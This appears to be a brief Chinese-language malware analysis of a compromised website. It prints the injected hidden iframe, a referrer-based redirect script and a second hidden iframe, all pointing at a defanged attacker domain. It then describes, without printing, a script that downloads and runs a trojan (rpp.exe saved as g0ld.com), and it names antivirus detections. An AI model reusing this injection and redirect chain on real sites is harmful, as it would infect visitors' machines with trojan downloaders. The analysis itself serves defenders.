网站首页插入如下代码:
/------------ <iframe src="hxxp://www.ac***66.cn/8***8/index.htm" width="0" height="0" frameborder="0"></iframe> ------------/
hxxp://www.ac***66.cn/8***8/index.htm 的内容为:
/-------- <SCRIPT language="JavaScript"> function cameFrom(where) { if (!document.referrer && !where) return true; else return (document.referrer.indexOf(where)>=0) } if (cameFrom("nen.com.cn")) { location.replace("3721.htm"); } else if (cameFrom("gov")) { location.replace("3721.htm"); } else if (cameFrom("or")) { location.replace("3721.htm"); } else if (cameFrom("bi")) { location.replace("3721.htm"); } else if (cameFrom("1488.com")) { location.replace("3721.htm"); } else { location.replace("mm.htm"); } </SCRIPT> --------/
hxxp://www.ac***66.cn/8***8/mm.htm 的内容为:
/-------- <iframe src="hxxp://www.ac***66.cn/8***8/joke.htm" width="0" height="0" frameborder="0"></iframe> <script src='hxxp://s**59.cnzz.com/stat.php?id=230393&web_id=230393&show=pic' language='JavaScript' charset='gb2312'></script> --------/
hxxp://www.ac***66.cn/8***8/joke.htm 的内容为JavaScript脚本,由于其中包含了攻击者所属组织和QQ号,所里不公开具体内容。
该脚本利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件 hxxp://www.ac***66.cn/8***8/rpp.exe, 保存为 IE临时文件夹中的 g0ld.com,并利用Shell.Application 对象 的 ShellExecute 方法 来运行。(这与 小心通过QQ尾巴中的网址(Q-Zone.****qq.C0M)传播的维金/Viking蠕虫 中第二段脚本程序相似)
g0ld.com Kaspersky 报为 Trojan-Downloader.Win32.Delf.asb,瑞星报为 Trojan.DL.Delf.csh
